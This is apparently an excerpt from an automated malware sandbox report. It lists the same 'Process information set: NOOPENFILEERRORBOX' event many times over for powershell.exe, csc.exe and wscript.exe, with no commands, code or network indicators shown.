                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
